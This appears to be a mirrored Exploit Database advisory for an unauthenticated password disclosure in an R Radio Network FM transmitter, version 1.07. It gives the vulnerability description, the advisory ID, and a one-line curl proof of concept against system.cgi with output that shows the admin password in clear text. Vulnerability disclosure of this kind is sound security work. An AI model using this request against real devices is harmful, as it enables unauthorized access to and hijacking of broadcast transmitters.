R Radio Network FM Transmitter 1.07 system.cgi – Password Disclosure

• Exploit Database
• 40 阅读

• 作者： LiquidWorm
  日期： 2024-03-03
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51855/

• R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
  
  
  Vendor: R Radio Network
  Product web page: http://www.pktc.ac.th
  Affected version: 1.07
  
  Summary: R Radio FM Transmitter that includes FM Exciter and
  FM Amplifier parameter setup.
  
  Desc: The transmitter suffers from an improper access control
  that allows an unauthenticated actor to directly reference the
  system.cgi endpoint and disclose the clear-text password of the
  admin user allowing authentication bypass and FM station setup
  access.
  
  Tested on: CSBtechDevice
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2023-5802
  Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php
  
  
  09.10.2023
  
  --
  
  
  $ curl -s http://192.168.70.12/system.cgi
  <html><head><title>System Settings</title>
  ...
  ...
  Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
  ...
  ...
  $